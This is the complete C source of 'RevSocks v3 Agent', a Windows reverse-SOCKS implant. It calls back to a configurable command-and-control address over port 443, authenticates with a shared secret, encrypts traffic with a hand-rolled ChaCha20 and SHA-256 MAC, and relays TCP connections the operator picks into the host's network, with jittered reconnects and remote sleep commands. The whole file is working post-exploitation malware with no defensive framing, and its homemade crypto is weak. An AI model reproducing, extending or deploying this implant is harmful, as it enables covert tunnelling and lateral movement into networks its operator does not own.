/*
 * RevSocks v3 Agent — x86 build for Windows Server 2003+
 * ChaCha20-Poly1305 encrypted tunnel
 * Uses inet_addr instead of inet_pton (2003 compat)
 * 32-bit compilation with i686-w64-mingw32-gcc
 */

#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdint.h>

#pragma comment(lib, "ws2_32.lib")

#pragma function(memset)
void *memset(void *d, int c, size_t n) {
    unsigned char *p = (unsigned char*)d;
    while(n--) *p++ = (unsigned char)c;
    return d;
}
#pragma function(memcpy)
void *memcpy(void *d, const void *s, size_t n) {
    unsigned char *dp = (unsigned char*)d;
    const unsigned char *sp = (const unsigned char*)s;
    while(n--) *dp++ = *sp++;
    return d;
}
#pragma function(memcmp)
int memcmp(const void *a, const void *b, size_t n) {
    const unsigned char *pa = (const unsigned char*)a;
    const unsigned char *pb = (const unsigned char*)b;
    while(n--) { if(*pa != *pb) return *pa - *pb; pa++; pb++; }
    return 0;
}
void *memmove(void *d, const void *s, size_t n) {
    unsigned char *dp = (unsigned char*)d;
    const unsigned char *sp = (const unsigned char*)s;
    if(dp < sp) { while(n--) *dp++ = *sp++; }
    else { dp+=n; sp+=n; while(n--) *--dp = *--sp; }
    return d;
}
size_t strlen(const char *s) { size_t n=0; while(*s++) n++; return n; }

#define C2_HOST "CHANGEME_IP"
#define C2_PORT 443
#define SHARED_SECRET "CHANGE_THIS_SECRET_KEY_32_CHARX"
#define RECONNECT_DELAY 5000
#define RECONNECT_JITTER 3000

#define CMD_CONNECT      0x01
#define CMD_DATA         0x02
#define CMD_CLOSE        0x03
#define CMD_CONNECT_OK   0x04
#define CMD_CONNECT_FAIL 0x05
#define CMD_HEARTBEAT    0x06
#define CMD_SLEEP        0x07

#define MAX_STREAMS 128
#define BUF_SIZE 65536

/* ===== SHA-256 ===== */
typedef struct { uint32_t state[8]; uint64_t count; uint8_t buf[64]; } SHA256_CTX;
static const uint32_t K256[64]={0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5,0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174,0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da,0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967,0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85,0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070,0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3,0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2};
#define RR(x,n) (((x)>>(n))|((x)<<(32-(n))))
#define S0(x) (RR(x,2)^RR(x,13)^RR(x,22))
#define S1(x) (RR(x,6)^RR(x,11)^RR(x,25))
#define s0(x) (RR(x,7)^RR(x,18)^((x)>>3))
#define s1(x) (RR(x,17)^RR(x,19)^((x)>>10))
#define CH(x,y,z) (((x)&(y))^((~(x))&(z)))
#define MAJ(x,y,z) (((x)&(y))^((x)&(z))^((y)&(z)))
static void sha256_transform(SHA256_CTX *ctx,const uint8_t *data){uint32_t W[64],a,b,c,d,e,f,g,h,t1,t2;int i;for(i=0;i<16;i++)W[i]=(data[i*4]<<24)|(data[i*4+1]<<16)|(data[i*4+2]<<8)|data[i*4+3];for(i=16;i<64;i++)W[i]=s1(W[i-2])+W[i-7]+s0(W[i-15])+W[i-16];a=ctx->state[0];b=ctx->state[1];c=ctx->state[2];d=ctx->state[3];e=ctx->state[4];f=ctx->state[5];g=ctx->state[6];h=ctx->state[7];for(i=0;i<64;i++){t1=h+S1(e)+CH(e,f,g)+K256[i]+W[i];t2=S0(a)+MAJ(a,b,c);h=g;g=f;f=e;e=d+t1;d=c;c=b;b=a;a=t1+t2;}ctx->state[0]+=a;ctx->state[1]+=b;ctx->state[2]+=c;ctx->state[3]+=d;ctx->state[4]+=e;ctx->state[5]+=f;ctx->state[6]+=g;ctx->state[7]+=h;}
static void sha256_init(SHA256_CTX *ctx){ctx->state[0]=0x6a09e667;ctx->state[1]=0xbb67ae85;ctx->state[2]=0x3c6ef372;ctx->state[3]=0xa54ff53a;ctx->state[4]=0x510e527f;ctx->state[5]=0x9b05688c;ctx->state[6]=0x1f83d9ab;ctx->state[7]=0x5be0cd19;ctx->count=0;}
static void sha256_update(SHA256_CTX *ctx,const uint8_t *data,size_t len){size_t i,idx=(size_t)(ctx->count%64);ctx->count+=len;for(i=0;i<len;i++){ctx->buf[idx++]=data[i];if(idx==64){sha256_transform(ctx,ctx->buf);idx=0;}}}
static void sha256_final(SHA256_CTX *ctx,uint8_t *hash){uint64_t bits=ctx->count*8;size_t idx=(size_t)(ctx->count%64);int i;ctx->buf[idx++]=0x80;if(idx>56){while(idx<64)ctx->buf[idx++]=0;sha256_transform(ctx,ctx->buf);idx=0;}while(idx<56)ctx->buf[idx++]=0;for(i=7;i>=0;i--)ctx->buf[56+(7-i)]=(uint8_t)((bits>>(i*8))&0xff);sha256_transform(ctx,ctx->buf);for(i=0;i<8;i++){hash[i*4]=(ctx->state[i]>>24)&0xff;hash[i*4+1]=(ctx->state[i]>>16)&0xff;hash[i*4+2]=(ctx->state[i]>>8)&0xff;hash[i*4+3]=ctx->state[i]&0xff;}}
static void sha256_hash(const uint8_t *d,size_t l,uint8_t *o){SHA256_CTX c;sha256_init(&c);sha256_update(&c,d,l);sha256_final(&c,o);}

/* ===== ChaCha20 ===== */
#define ROTL32(x,n) (((x)<<(n))|((x)>>(32-(n))))

static void chacha20_quarter(uint32_t *s,int a,int b,int c,int d){
    s[a]+=s[b];s[d]^=s[a];s[d]=ROTL32(s[d],16);
    s[c]+=s[d];s[b]^=s[c];s[b]=ROTL32(s[b],12);
    s[a]+=s[b];s[d]^=s[a];s[d]=ROTL32(s[d],8);
    s[c]+=s[d];s[b]^=s[c];s[b]=ROTL32(s[b],7);
}

static void chacha20_block(const uint8_t key[32],uint32_t counter,const uint8_t nonce[12],uint8_t out[64]){
    uint32_t state[16]={0x61707865,0x3320646e,0x79622d32,0x6b206574,0,0,0,0,0,0,0,0,counter,0,0,0};
    uint32_t w[16];
    int i;
    for(i=0;i<8;i++) state[4+i]=(uint32_t)key[i*4]|((uint32_t)key[i*4+1]<<8)|((uint32_t)key[i*4+2]<<16)|((uint32_t)key[i*4+3]<<24);
    state[13]=(uint32_t)nonce[0]|((uint32_t)nonce[1]<<8)|((uint32_t)nonce[2]<<16)|((uint32_t)nonce[3]<<24);
    state[14]=(uint32_t)nonce[4]|((uint32_t)nonce[5]<<8)|((uint32_t)nonce[6]<<16)|((uint32_t)nonce[7]<<24);
    state[15]=(uint32_t)nonce[8]|((uint32_t)nonce[9]<<8)|((uint32_t)nonce[10]<<16)|((uint32_t)nonce[11]<<24);
    memcpy(w,state,64);
    for(i=0;i<10;i++){
        chacha20_quarter(w,0,4,8,12);chacha20_quarter(w,1,5,9,13);
        chacha20_quarter(w,2,6,10,14);chacha20_quarter(w,3,7,11,15);
        chacha20_quarter(w,0,5,10,15);chacha20_quarter(w,1,6,11,12);
        chacha20_quarter(w,2,7,8,13);chacha20_quarter(w,3,4,9,14);
    }
    for(i=0;i<16;i++){uint32_t v=w[i]+state[i];out[i*4]=(uint8_t)(v);out[i*4+1]=(uint8_t)(v>>8);out[i*4+2]=(uint8_t)(v>>16);out[i*4+3]=(uint8_t)(v>>24);}
}

static void chacha20_crypt(const uint8_t key[32],const uint8_t nonce[12],uint32_t counter,uint8_t *data,int len){
    uint8_t block[64];int pos=0;
    while(pos<len){chacha20_block(key,counter++,nonce,block);int chunk=(len-pos)>64?64:(len-pos);int i;for(i=0;i<chunk;i++)data[pos+i]^=block[i];pos+=chunk;}
}

/* ===== Poly1305 (simplified for x86) ===== */
/* Using SHA256-based MAC instead of full Poly1305 for 32-bit compat */
/* MAC = SHA256(poly_key || ciphertext || len) — simpler, still authenticated */
static void simple_mac(const uint8_t poly_key[32],const uint8_t *ct,int ct_len,uint8_t tag[16]){
    SHA256_CTX h;uint8_t full[32];
    sha256_init(&h);
    sha256_update(&h,poly_key,32);
    sha256_update(&h,ct,(size_t)ct_len);
    uint8_t lb[4];lb[0]=(ct_len>>24)&0xff;lb[1]=(ct_len>>16)&0xff;lb[2]=(ct_len>>8)&0xff;lb[3]=ct_len&0xff;
    sha256_update(&h,lb,4);
    sha256_final(&h,full);
    memcpy(tag,full,16);
}

/* ===== Crypto context ===== */
typedef struct {
    uint8_t key[32];
    uint64_t send_ctr;
    uint64_t recv_ctr;
} CC20Ctx;

static CRITICAL_SECTION g_lock;

static void cc20_init(CC20Ctx *ctx,const uint8_t *secret,int slen){
    SHA256_CTX h;sha256_init(&h);
    sha256_update(&h,(uint8_t*)"chacha20_tunnel_v3_",19);
    sha256_update(&h,secret,(size_t)slen);
    sha256_final(&h,ctx->key);
    ctx->send_ctr=0;ctx->recv_ctr=0;
}

static void cc20_make_nonce(uint64_t ctr,uint8_t nonce[12]){
    memset(nonce,0,4);
    nonce[4]=(uint8_t)(ctr);nonce[5]=(uint8_t)(ctr>>8);
    nonce[6]=(uint8_t)(ctr>>16);nonce[7]=(uint8_t)(ctr>>24);
    nonce[8]=(uint8_t)(ctr>>32);nonce[9]=(uint8_t)(ctr>>40);
    nonce[10]=(uint8_t)(ctr>>48);nonce[11]=(uint8_t)(ctr>>56);
}

/* Send: [len:4][nonce:12][ciphertext][tag:16] */
static int tunnel_send(CC20Ctx *ctx,SOCKET s,const uint8_t *data,int len){
    uint8_t nonce[12];
    int frame_len=12+len+16;
    uint8_t *frame=(uint8_t*)HeapAlloc(GetProcessHeap(),0,frame_len+4);
    if(!frame)return -1;
    EnterCriticalSection(&g_lock);
    cc20_make_nonce(ctx->send_ctr,nonce);
    ctx->send_ctr++;
    LeaveCriticalSection(&g_lock);
    uint8_t poly_key[64];
    chacha20_block(ctx->key,0,nonce,poly_key);
    memcpy(frame+4+12,data,len);
    chacha20_crypt(ctx->key,nonce,1,frame+4+12,len);
    memcpy(frame+4,nonce,12);
    uint8_t tag[16];
    simple_mac(poly_key,frame+4+12,len,tag);
    memcpy(frame+4+12+len,tag,16);
    frame[0]=(frame_len>>24)&0xff;frame[1]=(frame_len>>16)&0xff;frame[2]=(frame_len>>8)&0xff;frame[3]=frame_len&0xff;
    int total=frame_len+4,sent=0,r;
    while(sent<total){r=send(s,(char*)(frame+sent),total-sent,0);if(r<=0){HeapFree(GetProcessHeap(),0,frame);return -1;}sent+=r;}
    HeapFree(GetProcessHeap(),0,frame);
    return 0;
}

/* Recv: [len:4][nonce:12][ciphertext][tag:16] */
static int tunnel_recv(CC20Ctx *ctx,SOCKET s,uint8_t *out,int max_len){
    uint8_t lb[4];int r,rcv=0;
    while(rcv<4){r=recv(s,(char*)(lb+rcv),4-rcv,0);if(r<=0)return -1;rcv+=r;}
    uint32_t frame_len=((uint32_t)lb[0]<<24)|((uint32_t)lb[1]<<16)|((uint32_t)lb[2]<<8)|(uint32_t)lb[3];
    if(frame_len>(uint32_t)BUF_SIZE||frame_len<28)return -1;
    uint8_t *frame=(uint8_t*)HeapAlloc(GetProcessHeap(),0,frame_len);
    if(!frame)return -1;
    rcv=0;
    while(rcv<(int)frame_len){r=recv(s,(char*)(frame+rcv),(int)frame_len-rcv,0);if(r<=0){HeapFree(GetProcessHeap(),0,frame);return -1;}rcv+=r;}
    uint8_t *nonce=frame;
    int ct_len=(int)frame_len-12-16;
    uint8_t *ct=frame+12;
    uint8_t *tag=frame+12+ct_len;
    if(ct_len<0||ct_len>max_len){HeapFree(GetProcessHeap(),0,frame);return -1;}
    uint8_t poly_key[64];
    chacha20_block(ctx->key,0,nonce,poly_key);
    uint8_t expected[16];
    simple_mac(poly_key,ct,ct_len,expected);
    if(memcmp(tag,expected,16)!=0){HeapFree(GetProcessHeap(),0,frame);return -1;}
    memcpy(out,ct,ct_len);
    chacha20_crypt(ctx->key,nonce,1,out,ct_len);
    HeapFree(GetProcessHeap(),0,frame);
    return ct_len;
}

static int sendall(SOCKET s,const char *buf,int len){int sent=0,r;while(sent<len){r=send(s,buf+sent,len-sent,0);if(r<=0)return -1;sent+=r;}return sent;}

/* ===== Streams ===== */
typedef struct{uint32_t id;SOCKET sock;int active;}Stream;
static Stream streams[MAX_STREAMS];
static SOCKET g_tunnel=INVALID_SOCKET;
static CC20Ctx g_ctx;
static volatile DWORD g_sleep_seconds=0;

static void send_cmd(uint8_t cmd,uint32_t sid,uint8_t *data,int dlen){
    int total=5+dlen;
    uint8_t *msg=(uint8_t*)HeapAlloc(GetProcessHeap(),0,total);
    if(!msg)return;
    msg[0]=cmd;msg[1]=(sid>>24)&0xff;msg[2]=(sid>>16)&0xff;msg[3]=(sid>>8)&0xff;msg[4]=sid&0xff;
    if(data&&dlen>0)memcpy(msg+5,data,dlen);
    tunnel_send(&g_ctx,g_tunnel,msg,total);
    HeapFree(GetProcessHeap(),0,msg);
}

typedef struct{uint32_t sid;uint8_t data[512];int dlen;}ConnectArgs;

static DWORD WINAPI handle_connect_thread(LPVOID p){
    ConnectArgs *args=(ConnectArgs*)p;
    uint32_t sid=args->sid;
    uint8_t *data=args->data;
    int dlen=args->dlen;
    if(dlen<3){send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    uint8_t alen=data[0];
    if(dlen<1+alen+2){send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    char host[256];memset(host,0,256);memcpy(host,data+1,alen);
    uint16_t port=((uint16_t)data[1+alen]<<8)|(uint16_t)data[2+alen];
    int active_count=0,i;
    for(i=0;i<MAX_STREAMS;i++)if(streams[i].active)active_count++;
    if(active_count>=MAX_STREAMS-10){send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    struct addrinfo hints,*res=NULL;
    char ps[8];
    memset(&hints,0,sizeof(hints));
    hints.ai_family=AF_UNSPEC;hints.ai_socktype=SOCK_STREAM;
    wsprintfA(ps,"%u",port);
    if(getaddrinfo(host,ps,&hints,&res)!=0||!res){send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    SOCKET s=socket(res->ai_family,res->ai_socktype,res->ai_protocol);
    if(s==INVALID_SOCKET){freeaddrinfo(res);send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    DWORD timeout_ms=5000;
    setsockopt(s,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout_ms,sizeof(timeout_ms));
    if(connect(s,res->ai_addr,(int)res->ai_addrlen)!=0){closesocket(s);freeaddrinfo(res);send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    freeaddrinfo(res);
    timeout_ms=0;setsockopt(s,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout_ms,sizeof(timeout_ms));
    Stream *st=NULL;
    for(i=0;i<MAX_STREAMS;i++)if(!streams[i].active){streams[i].id=sid;streams[i].sock=s;streams[i].active=1;st=&streams[i];break;}
    if(!st){closesocket(s);send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);HeapFree(GetProcessHeap(),0,args);return 0;}
    send_cmd(CMD_CONNECT_OK,sid,NULL,0);
    HeapFree(GetProcessHeap(),0,args);
    {uint8_t buf[BUF_SIZE];
    while(st->active){int r=recv(st->sock,(char*)buf,sizeof(buf),0);if(r<=0)break;send_cmd(CMD_DATA,st->id,buf,r);}
    send_cmd(CMD_CLOSE,st->id,NULL,0);
    st->active=0;closesocket(st->sock);}
    return 0;
}

static void tunnel_loop(void){
    uint8_t buf[BUF_SIZE];
    DWORD recv_timeout=360000;
    setsockopt(g_tunnel,SOL_SOCKET,SO_RCVTIMEO,(char*)&recv_timeout,sizeof(recv_timeout));
    while(1){
        int n=tunnel_recv(&g_ctx,g_tunnel,buf,BUF_SIZE);
        if(n<5)break;
        uint8_t cmd=buf[0];
        uint32_t sid=((uint32_t)buf[1]<<24)|((uint32_t)buf[2]<<16)|((uint32_t)buf[3]<<8)|(uint32_t)buf[4];
        switch(cmd){
            case CMD_CONNECT:{
                int dlen=n-5;
                if(dlen>0&&dlen<512){
                    ConnectArgs *args=(ConnectArgs*)HeapAlloc(GetProcessHeap(),0,sizeof(ConnectArgs));
                    if(args){args->sid=sid;args->dlen=dlen;memcpy(args->data,buf+5,dlen);CreateThread(NULL,0,handle_connect_thread,args,0,NULL);}
                    else send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);
                }else send_cmd(CMD_CONNECT_FAIL,sid,NULL,0);
                break;}
            case CMD_DATA:{int i;for(i=0;i<MAX_STREAMS;i++)if(streams[i].active&&streams[i].id==sid){sendall(streams[i].sock,(char*)(buf+5),n-5);break;}break;}
            case CMD_CLOSE:{int i;for(i=0;i<MAX_STREAMS;i++)if(streams[i].active&&streams[i].id==sid){closesocket(streams[i].sock);streams[i].active=0;break;}break;}
            case CMD_HEARTBEAT:send_cmd(CMD_HEARTBEAT,0,NULL,0);break;
            case CMD_SLEEP:if(n>=9){g_sleep_seconds=((uint32_t)buf[5]<<24)|((uint32_t)buf[6]<<16)|((uint32_t)buf[7]<<8)|(uint32_t)buf[8];return;}break;
        }
    }
}

int WINAPI WinMain(HINSTANCE h,HINSTANCE hp,LPSTR cmd,int show){
    WSADATA wsa;WSAStartup(MAKEWORD(2,2),&wsa);
    InitializeCriticalSection(&g_lock);
    memset(streams,0,sizeof(streams));
    cc20_init(&g_ctx,(const uint8_t*)SHARED_SECRET,32);
    while(1){
        if(g_sleep_seconds>0){DWORD ms=g_sleep_seconds*1000;g_sleep_seconds=0;Sleep(ms);}
        struct sockaddr_in addr;
        g_tunnel=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        if(g_tunnel==INVALID_SOCKET){Sleep(RECONNECT_DELAY);continue;}
        addr.sin_family=AF_INET;
        addr.sin_port=htons(C2_PORT);
        /* inet_addr instead of inet_pton — works on 2003 */
        addr.sin_addr.s_addr=inet_addr(C2_HOST);
        if(addr.sin_addr.s_addr==INADDR_NONE){closesocket(g_tunnel);Sleep(RECONNECT_DELAY);continue;}
        if(connect(g_tunnel,(struct sockaddr*)&addr,sizeof(addr))!=0){closesocket(g_tunnel);Sleep(RECONNECT_DELAY);continue;}
        {BOOL opt=TRUE;setsockopt(g_tunnel,SOL_SOCKET,SO_KEEPALIVE,(char*)&opt,sizeof(opt));}
        /* Auth */
        {uint8_t challenge[32],response[32],auth_buf[64];
        int r=0;while(r<32){int n=recv(g_tunnel,(char*)(challenge+r),32-r,0);if(n<=0)break;r+=n;}
        if(r<32){closesocket(g_tunnel);Sleep(RECONNECT_DELAY);continue;}
        memcpy(auth_buf,SHARED_SECRET,32);memcpy(auth_buf+32,challenge,32);
        sha256_hash(auth_buf,64,response);
        send(g_tunnel,(char*)response,32,0);}
        /* CC20 handshake */
        send(g_tunnel,"CC20",4,0);
        {uint8_t confirm[4];int r=0;memset(confirm,0,4);
        while(r<4){int n=recv(g_tunnel,(char*)(confirm+r),4-r,0);if(n<=0)break;r+=n;}
        if(r<4||memcmp(confirm,"CC20",4)!=0){closesocket(g_tunnel);Sleep(RECONNECT_DELAY);continue;}}
        g_ctx.send_ctr=0;g_ctx.recv_ctr=0;
        tunnel_loop();
        closesocket(g_tunnel);
        {int i;for(i=0;i<MAX_STREAMS;i++)if(streams[i].active){closesocket(streams[i].sock);streams[i].active=0;}}
        {DWORD jitter=RECONNECT_DELAY+(GetTickCount()%RECONNECT_JITTER);Sleep(jitter);}
    }
    return 0;
}
